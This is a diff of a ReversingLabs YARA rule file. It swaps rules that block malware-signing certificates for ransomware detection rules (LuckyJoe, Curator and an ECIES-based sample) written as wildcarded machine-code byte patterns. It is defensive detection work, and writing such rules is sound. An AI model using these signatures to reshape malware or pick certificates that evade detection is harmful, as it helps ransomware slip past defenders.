+            0F 43 4D ?? 51 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 95 ?? ?? ?? ?? 8B 06 52 8B 48 ?? 03 CE 8B 01 FF 50 ??
+            C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 0D 8B 01 6A ?? 8B 40 ?? 03 C8 8B 01 FF 10 33 F6 C6 45 ?? ?? 56 6A ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 83 EC ?? 8B CC 53 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
+        }
+		$ol_ecies_key_2 = {
+            56 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 53
+            E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45
+            ?? ?? 50 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 59 50 8D 4D ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ??
+            56 E8 ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56
+            E8 ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 33 F6 C6 45 ?? ?? 56 50 8D 4D ?? E8 ?? ??
+            ?? ?? 56 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 95 ?? ?? ?? ?? 8B CC 89 65 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 53 E8 ??
+            ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ??
+            56 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+        }
+		$ol_ecies_key_3 = {
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? EB 30 83 EC ?? 8D 55 ?? 8B CC 89 65 ?? E8
+            ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC BB ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 51 8D 4F ??
+            E8 ?? ?? ?? ?? 8D 77 ?? C7 07 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 53 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 46 ?? C6 45 ?? ?? 85 C0 74 05 8D 4E ?? EB 02 33 C9 8D 55 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 8B 06 8B CE FF 50 ?? 6A ?? 68 ?? ?? ?? ?? 8B 08 8B 49 ?? 03 C8 8B 01 FF 50 ?? 53 E8 ?? ?? ?? ?? 59 6A ??
+            6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B C7 5F 5E 64 89 0D ?? ?? ?? ?? 5B
+            8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CSTech Software Inc." and pe.signatures [ i ] . serial == "7b:fb:fd:fe:f4:36:08:73:0e:e1:47:79:ee:3e:e2:cb" and 1590537600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $ol_do_filetypes_1 and $ol_do_filetypes_2 and $ol_do_filetypes_3 ) and ( $ol_ecies_key_1 and $ol_ecies_key_2 and $ol_ecies_key_3 ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_62205361A758B00572D417Cba014F007 : INFO FILE
+rule REVERSINGLABS_Linux_Ransomware_Luckyjoe : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects LuckyJoe ransomware."
 		author = "ReversingLabs"
-		id = "85da8e0e-d791-5fed-b9ea-c681462651a6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "8dc98d71-b79d-5b09-9383-11f2b57baeb5"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4142-L4158"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ebf28921c81191bcf6130baf6532122bb320cc916e38ab225f0acdcb57ea00f3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Linux.Ransomware.LuckyJoe.yara#L1-L146"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1e7df2c45bee072af233cf8f355a84ec931fe96afa3fbdcd225dded1b75ea961"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "LuckyJoe"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UNITEKH-S, OOO" and pe.signatures [ i ] . serial == "62:20:53:61:a7:58:b0:05:72:d4:17:cb:a0:14:f0:07" and 1590470683 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_4B47D18Dbea57Abd1563Ddf89F87A6C2 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "689c1f80-3b3c-5bd7-9129-4f508cad7fb4"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4160-L4176"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2e464f4e9bfe0c9510a78552acffb241d2435ea9bf3f5f2501353d7f8f280d78"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$main_call_p1 = {
+            55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48
+            C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ??
+            48 89 45 ?? 48 8B 55 ?? 48 8B 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 75 ?? 48
+            8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? BE ?? ??
+            ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 C7 E8
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? E8 ?? ??
+            ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 35 ?? ?? ?? ?? 48 83 EC ?? 48 8B 45
+            ?? 6A ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C7
+            E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 15 ?? ?? ?? ?? 48 8B 45 ?? 48 89 D6 48 89 C7 E8 ??
+            ?? ?? ?? 48 8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ??
+            ?? ?? 48 98 48 89 45 ?? 48 8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48
+        }
+		$main_call_p2 = {
+            89 C7 E8 ?? ?? ?? ?? 48 98 48 89 45 ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ??
+            ?? 48 89 45 ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45
+            ?? 89 C2 48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C2
+            48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 55 ?? 48 8B 45 ?? 48
+            01 D0 C6 00 ?? 48 8B 55 ?? 48 8B 45 ?? 48 01 D0 C6 00 ?? 48 8B 45 ?? 48 8B 55 ?? 48
+            89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75 ?? BF ?? ?? ?? ?? E8 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? B8
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 45 ??
+            48 83 7D ?? ?? 74 ?? 48 8B 55 ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8
+        }
+		$main_call_p3 = {
+            E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? B8 ?? ??
+            ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C7 E8 ?? ??
+            ?? ?? 48 C7 45 ?? ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 45
+            ?? 48 83 7D ?? ?? 74 ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 48 8B 55 ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            89 45 ?? 83 7D ?? ?? 79 ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? EB ?? 48 8B 45 ?? 48 89
+            C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ??
+            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 48 98 48 8B 84
+            C5 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 48 98
+            48 8B 84 C5 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 83 7D ?? ?? 74 ?? BF ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8
+            ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? C9 C3
+        }
+		$encrypt_files_p1 = {
+            55 48 89 E5 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ??
+            ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C7 48 89 D6 F3 48 A5 48 89 F2 48 89 F8 0F B7 0A 66 89
+            08 48 8D 40 ?? 48 8D 52 ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            48 C7 45 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 D7
+            F3 48 AB 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75
+            ?? 48 8B 85 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7
+            E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
+            48 89 C7 E8 ?? ?? ?? ?? 48 89 C3 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48
+            01 D8 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 85 ?? ?? ?? ?? BE ?? ??
+            ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B 95 ?? ?? ??
+            ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 8B 45
+            ?? 48 8D 48 ?? 48 8B 95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 85 ?? ?? ?? ?? 48 89 CE 48
+            89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? EB ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ??
+            ?? 48 89 C2 48 8B 45 ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 45 ?? 48
+        }
+		$encrypt_files_p2 = {
+            89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ??
+            ?? EB ?? 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            89 45 ?? 48 83 7D ?? ?? 75 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48
+            8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? BE ?? ?? ?? ??
+            48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? BE ?? ?? ??
+            ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 45
+            ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C3 48 8B 45 ?? 48 89 C7 E8 ??
+            ?? ?? ?? 48 01 D8 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 85 ?? ?? ??
+            ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B
+            95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
+            ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B 95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89
+            C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 0F
+            85 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3
+        }
+		$encrypt_internal_message_p1 = {
+            55 48 89 E5 53 48 83 EC ?? 48 89 7D ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? BF ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 48 8B
+            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 83 C0 ?? 48 98 48 89 C7 E8 ?? ?? ??
+            ?? 48 89 45 ?? 8B 45 ?? 83 C0 ?? 48 63 D0 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ??
+            ?? ?? ?? 8B 45 ?? 48 63 D0 48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ??
+            8B 45 ?? 48 98 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 8B 45 ?? 83 E8 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 66 0F EF C0 F2 0F 2A 45 ??
+            66 0F EF C9 F2 0F 2A 4D ?? F2 0F 5E C1 E8 ?? ?? ?? ?? F2 0F 2C C0 89 45 ?? 8B 45 ??
+            0F AF 45 ?? 48 98 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 8B 45 ?? 0F AF 45 ?? 48 63 D0
+            48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 45 ?? 0F AF 45 ?? 89 C3 48 8B
+            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 8B 45 ?? 89 C1 89 DA BF ?? ?? ?? ?? B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 3B 45 ?? 7D ?? 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 45
+            ?? 48 63 D0 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 89
+        }
+		$encrypt_internal_message_p2 = {
+            C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 48 63 D0 48 8B 45 ?? 48 8D
+            34 02 48 8B 4D ?? 48 8B 55 ?? 8B 45 ?? 41 B8 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 89 45
+            ?? 8B 45 ?? 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? E8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 48 8B 45 ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? 48
+            8B 05 ?? ?? ?? ?? 48 8B 55 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ??
+            48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 8B 45 ?? 48 63 D0 8B 45 ?? 48 63 C8 48 8B 45 ?? 48 01 C1 48 8B 45 ?? 48 89 C6
+            48 89 CF E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ??
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 8B 45 ?? 01 45 ?? 48 8B 45 ?? 48 89
+            C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 8B 45 ?? 3B 45 ?? 0F 8E ?? ?? ?? ?? 48 8B 45 ?? 48 89
+            C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 4D ?? 48 8B 45 ?? BA ?? ??
+            ?? ?? 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ??
+            48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C4 ?? 5B 5D
+            C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KBK, OOO" and pe.signatures [ i ] . serial == "4b:47:d1:8d:be:a5:7a:bd:15:63:dd:f8:9f:87:a6:c2" and 1590485607 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( all of ( $main_call_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $encrypt_internal_message_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Be41E2C7Bb2493044B9241Abb732599D : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Curator : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Curator ransomware."
 		author = "ReversingLabs"
-		id = "81e5a8f3-0893-534a-ab4f-5c2c47078b40"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "401f1d64-afd9-55b1-8e87-b808d4679e9a"
+		date = "2021-04-22"
+		modified = "2021-04-22"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4178-L4196"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "eb5d94b80fd030d14dc26878895c61761825f3c77209ca0280e88dcd1800f9c2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.Curator.yara#L1-L94"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8bd29195cea0f1194e27c48ed07c52100abb7dd3de2ef7f51a645d32c3527eb3"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Curator"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Company Babylon" and ( pe.signatures [ i ] . serial == "00:be:41:e2:c7:bb:24:93:04:4b:92:41:ab:b7:32:59:9d" or pe.signatures [ i ] . serial == "be:41:e2:c7:bb:24:93:04:4b:92:41:ab:b7:32:59:9d" ) and 1589146251 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_15C5Af15Afecf1C900Cbab0Ca9165629 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "de734943-e735-5895-b76e-5f8588a77540"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4198-L4214"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5c54f32dbac271b2b60ec40bd052b5566a512cd2bcb4255057b21262806882d2"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ?? ?? 33 D2 FF 15 ?? ?? ??
+            ?? 48 8B BD ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 48 85 FF 0F 84 ?? ?? ?? ?? 48 8B 0D ??
+            ?? ?? ?? 41 8B DC 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 7E ?? 45 33 F6 48 8B
+            05 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 41 0F BE 8C 06 ?? ?? ?? ?? 45 0F
+            BE 8C 06 ?? ?? ?? ?? 89 4C 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 48 8D 8D
+            ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 8B CB 4D 8D 76 ?? FF C3 41 83 C4 ?? 88 84 0D
+            ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 44 3B E0 7C
+            ?? 4C 8D 35 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 E4 48 89 44 24 ?? 48 8D 95 ?? ??
+            ?? ?? 45 33 C9 44 89 64 24 ?? 44 8B C3 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
+            ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8D 4C 24 ?? 48 8B 15 ?? ?? ?? ?? 4C 8B C3 E8 ?? ?? ??
+            ?? 48 8B 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 8D 44 24 ??
+            48 89 44 24 ?? 45 33 C9 48 8D 44 24 ?? 89 9D ?? ?? ?? ?? 33 D2 48 89 44 24 ?? FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 41 8B DC 44 39 A5 ?? ?? ?? ?? 76 ?? 8B C3 4C 8D 05 ?? ?? ??
+            ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 44 0F B6 4C 04 ?? E8 ?? ?? ?? ?? 48 8D 95 ??
+            ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? FF C3 3B 9D ?? ?? ?? ?? 72 ?? 48 8B 8D ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 33 D2 48 8B CF FF 15 ?? ?? ?? ?? B9
+        }
+		$encrypt_files_p2 = {
